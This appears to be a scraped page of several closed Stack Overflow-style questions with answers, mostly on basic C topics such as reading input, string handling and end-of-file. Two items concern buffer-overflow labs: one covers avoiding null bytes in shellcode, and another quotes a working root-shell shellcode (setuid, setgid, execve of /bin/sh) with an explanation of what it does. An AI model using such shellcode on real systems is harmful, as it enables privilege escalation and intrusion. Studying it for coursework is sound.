Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 8 years ago.
Improve this question
In a client server program I have to try a buffer overflow attack for a lab exercise. I need to pass a shell code with the input string to the server program. In the shell code there are some values as \x00 but the server terminates the string as soon as it reads \x00.
My shell code is like this:
\x55\x48\x89\xe5\x48\x83\xec\x20\xc7\x45\xe0\x59\x6f\x75\x20\xc7\x45\xe4\x6c\x6f
\x73\x65\x66\xc7\x45\xe8\x21\xba\x98\x0e\x40\x00\xb8\x09\x0e\x40\x00\x48\x89\xd6
My server terminates the string as soon as it sees \x00.
Please suggest a way to overcome this.
You can't pass your shellcode which contains null character to your application while it contains null character as you mentioned. Actually you should change your shellcode. If I remember correctly you could tell Metasploit to not generate specific characters while generating shellcode (in your case: null character).
Related
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 2 years ago.
Improve this question
I rarely log on and am very new to the C language, therefore I apologize if this is a duplicate question or if this is a silly query.
I'm currently learning C and am hitting a wall with strings. I understand that char arrays are used in place of strings in the language. My question is, is there a better way than to assign an arbitrary value when declaring a char[] for user input(i.e setting the size of the array to one value when the user might enter more or less than that amount of characters)?
If you're on a POSIX system (basically anything that's not Windows), you can use getline(3) to do this. It will automatically allocate a buffer of the right size for you. Otherwise, you'll have to guess a length, allocate that, then read the input up to that length, and if you guessed wrong, use realloc to increase your guess and try again.
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 6 years ago.
Improve this question
Need to read everything until say *** comes up:
Input:
Hey there
how are
you
***
Output:
Hey there
how are
you
Would have used scanf("%[^***]s) but can't read all lines at once.
Only having basic C knowledge
The way I would do this is read one line at a time (with a funcion such as fgets instead of scanf) and then see if the line that you last read is equal to ***. You can use use strcmp to do that but you can also do it by hand if you are not allowed to use strcmp for some reason.
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 6 years ago.
Improve this question
I've been given a practise homework to do from college which requires me to manually convert assembly code to machine code. I will display the images of what the before and after looks like. It basically requires my to remove the comments (after semi colon) and white spaces after the instruction. I found this to be puzzling since im a C noob and ive been thrown into assembly code. I am planning to do this in notepad++. The assembly language im using is meant to be very simplified since x86 would be ridiculous to start off on. Any help would be appreciated!
As stated in the comment, this has nothing to do with machine code, it's just trivial string manipulation (essentially, it's sed 's/[[:space:]]*\(;.*\)\?$//'):
Read a line
Walk the string one character at time; each time you find a non-whitespace character, write down its position in a variable.
When you find either the end of the string (character 0) or a semicolon (character ';'), truncate the string to the character following the last non-whitespace one you found (effectively, set it to zero).
Write down the updated string to the other file.
Repeat until the input file is finished.
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
I am calling a shellcode using buffer overflow to spawn a root shell. Can somebody explain what this shellcode exactly does? I have tried different shellcodes to spawn a root shell, but this was the only one which worked for me.
\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb
\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68
\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89
\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd
\x80
On first glance, the code appears to do setuid(0), then setgid(0), then call sys_execve() on some values (which include ASCII codes for "/bin//sh").
Looks like this is pure "payload" code, since I don't see anything to ensure the code is executed on the first place (buffer overflow, stack smashing, etc.).
(Thanks to #Hans Lub for the disassembler link)
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 8 years ago.
Improve this question
I'm trying to learn C, and am having difficulty understanding what end-of-file means, in terms of a statement like "if fgets() attempts to read past the end of file".
I understand that one can mark an EOF by pressing certain key combos, and that char '\0' represents an EOF, but there must be something basic that I'm not understanding regarding my question, and I hope someone can help explain it to me>
A file is a finite sequence of bytes, just like a book is a finite sequence of words. Eventually you reach the end and there's nothing more to read.
A null character does not represent the end of a file, by the way — you're probably confusing that with the null character used to mark the end of a string in memory in C/C++. That's unrelated to files.